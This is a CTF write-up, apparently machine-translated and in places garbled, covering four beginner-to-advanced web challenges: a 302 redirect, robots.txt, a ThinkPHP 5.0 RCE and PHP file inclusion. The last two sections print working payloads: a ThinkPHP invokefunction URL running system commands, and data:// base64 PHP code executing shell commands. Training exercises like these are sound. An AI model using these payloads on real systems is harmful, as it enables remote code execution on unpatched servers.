CTF_ Web: Advanced questions of attack and defense world expert zone WP (1-4)

0x00 Preface

Web The question of advanced area of master is to collect information 、 Agreement understanding 、php Grammar mastery and other advanced knowledge , The later , The more difficult the topic is , I don't know how much I can do , Keep updating .

0x01 baby_web

Title Description ： Think about the initial page
After opening, it is found that the initial path is 1.php, Usually the most common homepage we use is index.php, Input url test , I found that I immediately jumped to 1.php, Investigation of this topic 302 Knowledge of jump , Use burp Just follow up .

0x02 Training-WWW-Robots

According to the title of the question, we can see that the question is robots.txt knowledge .

Follow the prompts to visit f10g.php that will do .

0x03 php_rce

After this question is opened, there is tinkphp5.0 frame ,tinkphp As a widely used framework , Each version will have a large number of vulnerabilities , This question is correct 5.0 Version understanding and information gathering ability , Not hard to find 5.0.x The existence of version rce Loophole .
payload by
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
The current user is returned .

Cross directory ,cat File can , Final payload by
index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cd..%20;cd%20..;%20cd%20..;cd%20..;ls%20flag;cat%20flag

0x04 Web_php_include

Title Description ： no

From the source code of the topic, you can see , This topic is not allowed to use php:// Fake protocol , But yes strstr In terms of functions , Match case , So you can use PHP:// Fake protocol ,data:// Pseudo protocol contains malicious code , Get sensitive information .

'php://input'  Read only stream that can access the requested raw data ,  take post The data in the request is used as PHP Code execution .
'data://text/plain;base64,'  Set the base64 After encoding and decoding, it directly includes 

In passing page The value of this parameter , To use content base64 code , Prevent special character browsers from being difficult to recognize .
In this question, we use

<?php system('dir');
<?php system('cat xxxx.php');
 After two sentences of coding .
PD9waHAgc3lzdGVtKCdkaXInKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmw0Z2lzaXNpc2gzcjMucGhwJyk7

The transfer parameters of both methods are the same , First, list the contents , Again cat Corresponding file .
Use page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmw0Z2lzaXNpc2gzcjMucGhwJyk7
Check the source code to get falg